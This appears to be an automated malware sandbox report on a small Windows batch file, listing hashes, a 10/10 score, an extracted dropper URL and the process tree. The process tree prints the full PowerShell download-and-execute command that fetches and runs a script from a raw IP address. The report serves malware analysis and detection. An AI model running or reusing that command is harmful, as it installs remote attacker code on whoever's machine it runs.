Analysis
-
max time kernel
105s -
max time network
141s -
platform
windows10_x64 -
resource
win10v200217 -
submitted
05-03-2020 05:10
Static task
static1
Behavioral task
behavioral1
Sample
1Agr4GZR.bat
Resource
win7v200217
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
1Agr4GZR.bat
Resource
win10v200217
windows10_x64
0 signatures
0 seconds
General
-
Target
1Agr4GZR.bat
-
Size
195B
-
MD5
d8f17b7d64fd968c76fbda7167c2bf8e
-
SHA1
f90525aef93a39c5d07aab4cd7c5e8a87bc91ffe
-
SHA256
6bdb2e75595098a2c5dd9026ec2ac6d13fa279cd6d23217e7c0e28cc3318c708
-
SHA512
bfa55509af5be01bef540b299bf7737db0e69b7d811ec59412335f7be17e22d2fe1a4483d693e1daa4dc7f6538006669715b0718a5e78a7f750875c61cbb22d9
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/1Agr4GZR
Signatures
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3284 3628 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 3284 WerFault.exe Token: SeBackupPrivilege 3284 WerFault.exe Token: SeDebugPrivilege 3284 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 3284 WerFault.exe 3284 WerFault.exe 3284 WerFault.exe 3284 WerFault.exe 3284 WerFault.exe 3284 WerFault.exe 3284 WerFault.exe 3284 WerFault.exe 3284 WerFault.exe 3284 WerFault.exe 3284 WerFault.exe 3284 WerFault.exe 3284 WerFault.exe 3284 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1Agr4GZR.bat"1⤵PID:1952
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/1Agr4GZR');Invoke-CTSICHQLFDEF;Start-Sleep -s 10000"2⤵PID:3628
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3628 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3284